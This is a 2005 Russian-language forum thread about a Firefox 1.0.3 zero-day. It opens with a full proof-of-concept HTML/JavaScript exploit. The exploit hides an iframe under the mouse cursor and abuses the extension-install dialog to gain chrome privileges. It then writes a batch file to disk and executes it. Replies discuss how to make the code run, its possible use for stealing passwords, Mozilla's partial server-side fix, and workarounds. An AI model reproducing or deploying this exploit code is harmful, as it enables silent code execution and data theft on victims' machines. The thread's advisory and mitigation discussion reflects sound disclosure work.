// FrSIRT Comment - This is a 0day exploit/vulnerability (unpatched) // If a user clicks anywhere on a specially crafted page, this code will // automatically create and execute a malicious batch/exe file. <html><head><title>firefox 0day exploit</title> <body>Click anywhere inside this page<br> <br>Advisory - http://www.frsirt.com/english/advisories/2005/0493<br> <iframe onload="loader()" src="javascript:'<noscript>'+eval('if (window.name!=\'stealcookies\') {window.name=\'stealcookies\';} else{ event={target:{href:\'http://ftp.mozilla.org/pub/ mozilla.org/extensions/flashgot/flashgot-0.5.9.1-fx+mz+tb.xpi\'}};install(event,\'You are vulnerable!!!\',\'javascript:eval(\\\'netscape.security.PrivilegeManager.enablePrivilege(\\\\\\\' UniversalXPConnect\\\\\\\');file=Components.classes[\\\\\\\'@mozilla.org/file/local;1\\\\\\\']. createInstance(Components.interfaces.nsILocalFile);file.initWithPath(\\\\\\\'c:\\\\\\\\\\\\\\\\ booom.bat\\\\\\\');file.createUnique(Components.interfaces.nsIFile.NORMAL_FILE_TYPE,420); outputStream=Components.classes[\\\\\\\'@mozilla.org/network/file-output-stream;1\\\\\\\']. createInstance(Components.interfaces.nsIFileOutputStream);outputStream.init(file,0x04|0x08 |0x20,420,0);output=\\\\\\\'@ECHO off\\\\\\\\ncls\\\\\\\\nECHO malicious commands here... \\\\\\\\nPAUSE\\\\\\\';outputStream.write(output,output.length);outputStream.close();file.launch(); \\\')\'); }')+'</noscript><a href=\'https://addons.update.mozilla.org/extensions/moreinfo.php? id=220&application=firefox\' style=\'cursor:default;\'> </'+'a>'" id="targetframe" scrolling="no" frameborder="0" marginwidth="0" marginheight=0" style= "position:absolute; left:0px; width:0px; height:6px; width:6px; margin:0px; padding:0px; -moz-opacity:0"></iframe> <script language="JavaScript" type="text/javascript"> document.onmousemove = function trackMouse(e) { document.getElementById("targetframe").style.left = (e.pageX-3)+"px" document.getElementById("targetframe").style.top = (e.pageY-3)+"px" } var counter = 0; function loader() { counter++ if(counter == 1) { stealcookies.focus() } else if(counter == 2) { stealcookies.history.go(-1) //targetframe.style.display="none"; } } </script> </body> </html>
Сноси несвободное, отрубай от матриц
Отсутствует
баг позволяет обойти ограничения безопасноти в жс через жс триггер установки расширения
и заставить браузер съесть любой жс код
Сноси несвободное, отрубай от матриц
Отсутствует
в комбинацие с дыркой кэша это может быть использованио для афтоматизированного украдвания паролей
и прочей личной информации
Сноси несвободное, отрубай от матриц
Отсутствует
И что должно произойти? Внизу progress bar показывает обращение и загрузку с addons.update.mozilla.org, и всё. Никакого booom.bat я не нашёл.
Без бага и ошибки я софт Mozilla не люблю!
Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.1) Gecko/20061204 Firefox/2.0.0.1
Microsoft® Office Outlook® 2007 (12.0.4518.1014) MSO (12.0.4518.1014)
Отсутствует
Внизу progress bar показывает обращение и загрузку с addons.update.mozilla.org, и всё.
Обидно, у меня даже этого нет. Что я делаю не так?
Мир, в котором человек больше не властен
Мир, принадлежащий машинам...
Отсутствует
Psilon
Удали разрывы строк в <iframe> ... </iframe>
Без бага и ошибки я софт Mozilla не люблю!
Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.1) Gecko/20061204 Firefox/2.0.0.1
Microsoft® Office Outlook® 2007 (12.0.4518.1014) MSO (12.0.4518.1014)
Отсутствует
Update (08.05.2005) - The Mozilla Foundation patched (partially) this
issue on the server side by adding random letters and numbers to the
install function, which will prevent this exploit from working.
Мир, в котором человек больше не властен
Мир, принадлежащий машинам...
Отсутствует
http://www.frsirt.com/exploits/20050507.firefox0day.php
Bug 293302 - Firefox 1.0.3 Critical Vulnerability
http://it.slashdot.org/article.pl?sid=05/05/08/135217&from=rss
workaround: disable "tools/options/web-Features/>Allow web sites to install software"
Do not meddle in the affairs of Wizards, for they are subtle and quick to anger.
Отсутствует
А эксплойт позволяет загружать XPI со всех сайтов или только из моего белого списка?
Без бага и ошибки я софт Mozilla не люблю!
Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.1) Gecko/20061204 Firefox/2.0.0.1
Microsoft® Office Outlook® 2007 (12.0.4518.1014) MSO (12.0.4518.1014)
Отсутствует
Не знаю, у меня экслоит не заработал вообще (из аттачмента на багзилле). Но на всякий случай я выключил сабж моего прошлого поста.
Интересно, кто перешлёт этот код антивирусникам DrWeb и KAV, если он (код) неработающий? Я бы, всё-таки, хотел знать, как заставить его работать, т.к. иначе антивирусники его не примут.
Убирал разрывы между строками - всё равно не работает.
Отсутствует
Из бага 293302:
> the exploit does not work actually
Chris Thomas (CTho):
We took some steps on the update.mozilla.org side to mitigate the problem.
Отредактировано Vicious (09-05-2005 00:34:49)
Отсутствует
To protect yourself against all of these holes, disable JavaScript. (Some people have suggested only disabling software installation. If you only disable software installation, you will still be vulnerable to the XSS hole used in the exploit. XSS is sufficient for stealing cookies, saved passwords, intranet web pages, etc.)
Отключение пункта "Разрешать сайтам устанавливать программное обеспечение" не помогает.
Надо отключать JavaScript.
Отредактировано Psilon (09-05-2005 19:43:47)
Мир, в котором человек больше не властен
Мир, принадлежащий машинам...
Отсутствует
Отключение пункта "Разрешать сайтам устанавливать программное обеспечение" не помогает.
Надо отключать JavaScript.
Не путай две разных уязвимости.
От уязвимости, связанной с внедрением джаваскрипта в иконку в диалоге: хотите ли установить это расширение? спасает отключение "Разрешать сайтам устанавливать программное обеспечение". А от второй уязвимости, связаной с XSS, спасает отключение JavaScrpt.
Отредактировано gass512 (10-05-2005 13:58:41)
Отсутствует
Отключение пункта "Разрешать сайтам устанавливать программное обеспечение" не помогает.
Надо отключать JavaScript.Не путай две разных уязвимости.
От уязвимости, связанной с внедрением джаваскрипта в иконку в диалоге: хотите ли установить это расширение? спасает отключение "Разрешать сайтам устанавливать программное обеспечение". А от второй уязвимости, связаной с XSS, спасает отключение JavaScrpt.
О чём можно вообще говорить, если код неработоспособен. Пытаюсь под FF 1.0.2 запустить - не работает.
Отсутствует